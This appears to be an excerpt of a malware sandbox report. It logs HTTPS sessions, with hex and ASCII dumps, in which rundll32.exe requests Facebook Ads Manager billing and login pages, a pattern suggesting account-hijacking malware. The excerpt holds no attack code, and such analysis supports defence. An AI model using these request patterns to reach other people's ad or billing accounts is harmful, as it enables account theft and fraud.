                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:03 UTC144OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                    Content-Length: 3592
                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                    2023-01-05 07:57:03 UTC144OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                    2023-01-05 07:57:04 UTC148INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                    Expires: Thu, 05 Jan 2023 07:56:04 GMT
                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                    x-ms-route-info: R3_BL2
                                                                                                                                                                                    x-ms-request-id: c3e13b69-5869-48c4-b7ca-fc6493d6e890
                                                                                                                                                                                    PPServer: PPV: 30 H: BL02EPF000016C4 V: 0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:03 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 11296
                                                                                                                                                                                    2023-01-05 07:57:04 UTC148INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    70192.168.2.450474157.240.214.35443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 08:00:34 UTC19912OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                    Host: www.facebook.com
                                                                                                                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
                                                                                                                                                                                    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    sec-ch-prefers-color-scheme: light
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    2023-01-05 08:00:34 UTC19912INHTTP/1.1 302 Found
                                                                                                                                                                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                                                                                    x-fb-rlafr: 0
                                                                                                                                                                                    content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                                                                    2023-01-05 08:00:34 UTC19914INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                                                                    Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    71192.168.2.450482157.240.214.35443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 08:00:34 UTC19916OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                    Host: www.facebook.com
                                                                                                                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
                                                                                                                                                                                    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    sec-ch-prefers-color-scheme: light
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19916INHTTP/1.1 200 OK
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                                                                                    x-fb-rlafr: 0
                                                                                                                                                                                    content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19918INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                                                                    Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19919INData Raw: 64 30 36 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65
                                                                                                                                                                                    Data Ascii: d06e<!DOCTYPE html><html lang="en" id="face
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19919INData Raw: 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 79 44 33 7a 54 30 6a 62 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 65 4c 61 7a 79 3f 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 45 6e
                                                                                                                                                                                    Data Ascii: book" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="yD3zT0jb">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["En
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19921INData Raw: 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2f 77 65 62 2f 22 20 2f 3e 3c 6c
                                                                                                                                                                                    Data Ascii: url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><l
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19922INData Raw: 68 3d 22 59 6f 32 55 7a 4f 68 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 57 2f 72 2f 4e 6b 4a 57 66 32 44 48 41 79 67 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 58 4e 61 4d 6e 32 2b 22 20 6e 6f 6e 63 65 3d 22 79 44 33 7a 54 30 6a 62 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 79 44 33 7a 54 30 6a 62 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 28 7b 22 63 6c 70 44 61 74 61 22 3a
                                                                                                                                                                                    Data Ascii: h="Yo2UzOh" /><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yW/r/NkJWf2DHAyg.js?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="XNaMn2+" nonce="yD3zT0jb"></script><script nonce="yD3zT0jb">requireLazy(["HasteSupportData"],function(m){m.handle({"clpData":
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19924INData Raw: 65 22 3a 5b 5b 22 55 52 4c 46 72 61 67 6d 65 6e 74 50 72 65 6c 75 64 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 68 61 73 68 74 61 67 52 65 64 69 72 65 63 74 22 3a 74 72 75 65 2c 22 66 72 61 67 42 6c 61 63 6b 6c 69 73 74 22 3a 5b 22 6e 6f 6e 63 65 22 2c 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 2c 22 6f 61 75 74 68 5f 74 6f 6b 65 6e 22 2c 22 78 73 22 2c 22 63 68 65 63 6b 70 6f 69 6e 74 5f 64 61 74 61 22 2c 22 63 6f 64 65 22 5d 7d 2c 31 33 37 5d 2c 5b 22 43 6f 6d 65 74 50 65 72 73 69 73 74 51 75 65 72 79 50 61 72 61 6d 73 22 2c 5b 5d 2c 7b 22 72 65 6c 61 74 69 76 65 22 3a 7b 7d 2c 22 64 6f 6d 61 69 6e 22 3a 7b 7d 7d 2c 36 32 33 31 5d 2c 5b 22 43 6f 6f 6b 69 65 44 6f 6d 61 69 6e 22 2c 5b 5d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 66 61 63 65 62 6f 6f 6b 2e 63 6f
                                                                                                                                                                                    Data Ascii: e":[["URLFragmentPreludeConfig",[],{"hashtagRedirect":true,"fragBlacklist":["nonce","access_token","oauth_token","xs","checkpoint_data","code"]},137],["CometPersistQueryParams",[],{"relative":{},"domain":{}},6231],["CookieDomain",[],{"domain":"facebook.co
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19925INData Raw: 2c 22 55 53 45 52 5f 49 44 22 3a 22 30 22 2c 22 4e 41 4d 45 22 3a 22 22 2c 22 53 48 4f 52 54 5f 4e 41 4d 45 22 3a 6e 75 6c 6c 2c 22 49 53 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 48 41 53 5f 53 45 43 4f 4e 44 41 52 59 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 22 3a 66 61 6c 73 65 2c 22 49 53 5f 46 41 43 45 42 4f 4f 4b 5f 57 4f 52 4b 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 4f 4e 4c 59 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 44 45 41 43 54 49 56 41 54 45 44 5f 41 4c 4c 4f 57 45 44 5f 4f 4e 5f 4d 45 53 53 45 4e 47 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 43 41 4c 4c 5f 47 55 45 53 54 5f 55 53 45 52 22 3a
                                                                                                                                                                                    Data Ascii: ,"USER_ID":"0","NAME":"","SHORT_NAME":null,"IS_BUSINESS_PERSON_ACCOUNT":false,"HAS_SECONDARY_BUSINESS_PERSON":false,"IS_FACEBOOK_WORK_ACCOUNT":false,"IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_MESSENGER":false,"IS_MESSENGER_CALL_GUEST_USER":
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19927INData Raw: 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 22 2c 22 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 2c 22 70 6c 61 74 66 6f 72 6d 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 7d 2c 35 32 37 5d 2c 5b 22 50 72 6f 6d 69 73 65 55 73 65 50 6f 6c 79 66 69 6c 6c 53 65 74 49 6d 6d 65 64 69 61 74 65 47 4b 22 2c 5b 5d 2c 7b 22 77 77 77 5f 61 6c 77 61 79 73 5f 75 73 65 5f 70 6f 6c 79 66 69 6c 6c 5f 73 65 74 69 6d 6d 65 64 69 61 74 65 22 3a 66 61 6c 73 65 7d 2c 32 31 39 30 5d 2c 5b 22 4b 53 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6b 69 6c 6c 65 64 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 4d 4c 48 55 42 5f 46 4c 4f 57 5f 41 55 54 4f 52 45 46 52 45 53 48 5f 53 45 41 52 43 48 22 2c 22 4e 45 4b 4f 5f 44 49 53 41 42 4c 45 5f 43 52 45 41 54
                                                                                                                                                                                    Data Ascii: tformName":"Windows","platformVersion":"10","platformFullVersion":"10"},527],["PromiseUsePolyfillSetImmediateGK",[],{"www_always_use_polyfill_setimmediate":false},2190],["KSConfig",[],{"killed":{"__set":["MLHUB_FLOW_AUTOREFRESH_SEARCH","NEKO_DISABLE_CREAT
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19928INData Raw: 22 42 49 5a 5f 49 4e 42 4f 58 5f 50 4f 50 5f 55 50 5f 54 49 50 5f 4e 41 56 49 47 41 54 49 4f 4e 5f 42 55 47 5f 46 49 58 22 2c 22 53 52 54 5f 52 45 56 49 45 57 5f 44 49 53 41 42 4c 45 5f 46 45 4c 4c 4f 57 53 48 49 50 5f 52 45 56 49 45 57 22 2c 22 45 4f 5f 53 54 4f 52 45 5f 48 4f 4d 45 5f 50 41 47 45 5f 43 4f 56 49 44 31 39 5f 42 41 4e 4e 45 52 22 5d 7d 2c 22 6b 6f 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 33 4f 73 4c 76 6e 53 48 4e 54 74 22 2c 22 31 47 37 77 4a 36 62 4a 74 39 4b 22 2c 22 39 4e 70 6b 47 59 77 7a 72 50 47 22 2c 22 33 6f 68 35 4d 77 38 36 55 53 6a 22 2c 22 38 4e 41 63 65 45 79 39 4a 5a 6f 22 2c 22 37 46 4f 49 7a 6f 73 36 58 4a 58 22 2c 22 72 66 38 4a 45 50 47 67 4f 69 22 2c 22 34 6a 33 36 53 56 7a 76 50 33 77 22 2c 22 34 4e 53 71 33 5a 43 34 53
                                                                                                                                                                                    Data Ascii: "BIZ_INBOX_POP_UP_TIP_NAVIGATION_BUG_FIX","SRT_REVIEW_DISABLE_FELLOWSHIP_REVIEW","EO_STORE_HOME_PAGE_COVID19_BANNER"]},"ko":{"__set":["3OsLvnSHNTt","1G7wJ6bJt9K","9NpkGYwzrPG","3oh5Mw86USj","8NAceEy9JZo","7FOIzos6XJX","rf8JEPGgOi","4j36SVzvP3w","4NSq3ZC4S
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19930INData Raw: 22 49 6e 69 74 69 61 6c 43 6f 6f 6b 69 65 43 6f 6e 73 65 6e 74 22 2c 5b 5d 2c 7b 22 64 65 66 65 72 43 6f 6f 6b 69 65 73 22 3a 66 61 6c 73 65 2c 22 69 6e 69 74 69 61 6c 43 6f 6e 73 65 6e 74 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 5d 7d 2c 22 6e 6f 43 6f 6f 6b 69 65 73 22 3a 66 61 6c 73 65 2c 22 73 68 6f 75 6c 64 53 68 6f 77 43 6f 6f 6b 69 65 42 61 6e 6e 65 72 22 3a 66 61 6c 73 65 7d 2c 34 33 32 38 5d 2c 5b 22 57 65 62 43 6f 6e 6e 65 63 74 69 6f 6e 43 6c 61 73 73 53 65 72 76 65 72 47 75 65 73 73 22 2c 5b 5d 2c 7b 22 63 6f 6e 6e 65 63 74 69 6f 6e 43 6c 61 73 73 22 3a 22 45 58 43 45 4c 4c 45 4e 54 22 7d 2c 34 37 30 35 5d 2c 5b 22 43 6f 6d 65 74 41 6c 74 70 61 79 4a 73 53 64 6b 49 66 72 61 6d 65 41 6c 6c 6f 77 65 64 44 6f 6d 61 69 6e 73 22 2c 5b 5d 2c 7b 22 61 6c
                                                                                                                                                                                    Data Ascii: "InitialCookieConsent",[],{"deferCookies":false,"initialConsent":{"__set":[]},"noCookies":false,"shouldShowCookieBanner":false},4328],["WebConnectionClassServerGuess",[],{"connectionClass":"EXCELLENT"},4705],["CometAltpayJsSdkIframeAllowedDomains",[],{"al
                                                                                                                                                                                    2023-01-05 08:00:35 UTC19931INData Raw: 22 3a 7b 22 70 72 69 6d 61 72 79 47 72 6f 75 70 53 69 7a 65 22 3a 33 2c 22 73 65 63 6f 6e 64 61 72 79 47 72 6f 75 70 53 69 7a 65 22 3a 33 7d 2c 22 6e 75 6d 62 65 72 69 6e 67 53 79 73 74 65 6d 44 61 74 61 22 3a 6e 75 6c 6c 7d 2c 35 34 5d 2c 5b 22 53 65 73 73 69 6f 6e 4e 61 6d 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 65 65 64 22 3a 22 32 33 45 4e 22 7d 2c 37 35 37 5d 2c 5b 22 5a 65 72 6f 43 61 74 65 67 6f 72 79 48 65 61 64 65 72 22 2c 5b 5d 2c 7b 7d 2c 31 31 32 37 5d 2c 5b 22 5a 65 72 6f 52 65 77 72 69 74 65 52 75 6c 65 73 22 2c 5b 5d 2c 7b 22 72 65 77 72 69 74 65 5f 72 75 6c 65 73 22 3a 7b 7d 2c 22 77 68 69 74 65 6c 69 73 74 22 3a 7b 22 5c 2f 68 72 5c 2f 72 22 3a 31 2c 22 5c 2f 68 72 5c 2f 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 75 6e 73 75 70 70 6f
                                                                                                                                                                                    Data Ascii: ":{"primaryGroupSize":3,"secondaryGroupSize":3},"numberingSystemData":null},54],["SessionNameConfig",[],{"seed":"23EN"},757],["ZeroCategoryHeader",[],{},1127],["ZeroRewriteRules",[],{"rewrite_rules":{},"whitelist":{"\/hr\/r":1,"\/hr\/p":1,"\/zero\/unsuppo
